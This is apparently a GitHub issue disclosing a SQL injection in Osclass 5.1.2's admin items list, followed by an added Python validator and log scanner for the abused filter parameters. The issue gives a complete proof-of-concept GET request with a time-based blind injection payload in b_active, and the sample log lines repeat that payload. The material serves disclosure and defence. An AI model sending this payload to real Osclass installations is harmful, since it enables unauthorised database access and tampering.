mindstellar / Osclass

With Osclass, get your own classifieds site for free. Build your own Osclass installation and start advertising real estate, jobs or whatever you want- in minutes!
https://docs.mindstellar.com/
GNU General Public License v3.0

Osclass 5.1.2 has a SQL Injection Vulnerability #495

Closed Hebing123 closed 6 months ago

Hebing123 commented 8 months ago

Summary

Osclass 5.1.2 has a SQL Injection Vulnerability.

Details

An attacker with administrator rights can execute commands through SQL injection.

Proof of Concept (POC)

GET /oc-admin/index.php?b_active=(select(0)from(select(sleep(4)))v)&b_enabled=0&b_premium=1&b_spam=1&catId=10&city=San%20Francisco&cityId=San%20Francisco&countryId=USA&countryName=hebing123&direction=desc&iDisplayLength=10&page=items&region=NY&regionId=NY&sSearch=the&sort=date&user=hebing123&userId=hebing123 HTTP/1.1
X-Requested-With: XMLHttpRequest
Cookie: osclass=b44r3de2iae3vmvm8at026v7vu; 54f78354eccc6e15622d3aaeccf02ca2=oc_adminId._.oc_adminSecret._.oc_adminLocale._.listing_iDisplayLength%261._.v5qMg6iJ._.en_US._.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: 192.168.160.147
Connection: Keep-alive

Impact

  1. Leakage of user privacy information stored in the database;
  2. Tamper with some web pages by operating the database;
  3. Modify the value of some fields in the database, embed the network horse link, and mount the horse attack;
  4. The database server was maliciously operated, the system administrator account was tampered with;
  5. The database server provides operating system support, so that hackers can modify or control the operating system.
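A defender-side check for the filter parameters the PoC abuses, added here as an example and not part of this report or of the Osclass code base: it validates each admin items-list filter against the small domain it should have, then replays the same check over constructed access-log lines. Parameter names come from the PoC request; the allowed domains (0/1 for the b_* flags, digits for ids, asc/desc and a short sort allowlist) are assumptions.

```python
"""Strict validation of the oc-admin items-list filters abused in the PoC (illustration, not Osclass code).
Each filter has a tiny legal domain, so a subquery in b_active is rejected before any SQL is built,
and the same check replayed over access logs surfaces probing attempts."""
import re
from urllib.parse import parse_qs, urlsplit

# Parameter names are taken from the PoC request; the allowed domains are assumptions.
BOOL_PARAMS = {"b_active", "b_enabled", "b_premium", "b_spam"}
INT_PARAMS = {"catId", "iDisplayLength"}
ENUM_PARAMS = {"direction": {"asc", "desc"}, "sort": {"date", "title"}}

def validate_filters(query: str) -> list[str]:
    """Return the 'name=value' pairs outside their allowed domain (empty list means clean)."""
    bad = []
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            if name in BOOL_PARAMS and value not in ("0", "1"):
                bad.append(f"{name}={value}")
            elif name in INT_PARAMS and not value.isdigit():
                bad.append(f"{name}={value}")
            elif name in ENUM_PARAMS and value not in ENUM_PARAMS[name]:
                bad.append(f"{name}={value}")
    return bad

# Request line of a combined-format access log entry: "GET /path?query HTTP/1.1"
REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def suspicious_admin_requests(log_lines) -> list[tuple[str, list[str]]]:
    """Return (path, offending params) for /oc-admin/ requests whose filters fail validation."""
    hits = []
    for line in log_lines:
        match = REQUEST_LINE.search(line)
        if not match:
            continue
        parts = urlsplit(match.group("target"))
        if not parts.path.startswith("/oc-admin/"):
            continue  # only the admin grid accepts these filters
        offending = validate_filters(parts.query)
        if offending:
            hits.append((parts.path, offending))
    return hits

# Constructed sample lines; the first carries the b_active value from the PoC above.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:00:00:00 +0000] "GET /oc-admin/index.php?b_active=(select(0)from(select(sleep(4)))v)&b_enabled=0&page=items&sort=date&direction=desc HTTP/1.1" 200 512',
    '192.0.2.11 - - [01/Jan/2024:00:00:05 +0000] "GET /oc-admin/index.php?b_active=1&b_enabled=0&page=items&sort=date&direction=desc HTTP/1.1" 200 512',
    '192.0.2.12 - - [01/Jan/2024:00:00:09 +0000] "GET /index.php?page=search&sCategory=10 HTTP/1.1" 200 2048',
]
```

Running `suspicious_admin_requests(SAMPLE_LOG)` reports only the first line, with `b_active` as the offending parameter; the public search request is out of scope and ignored.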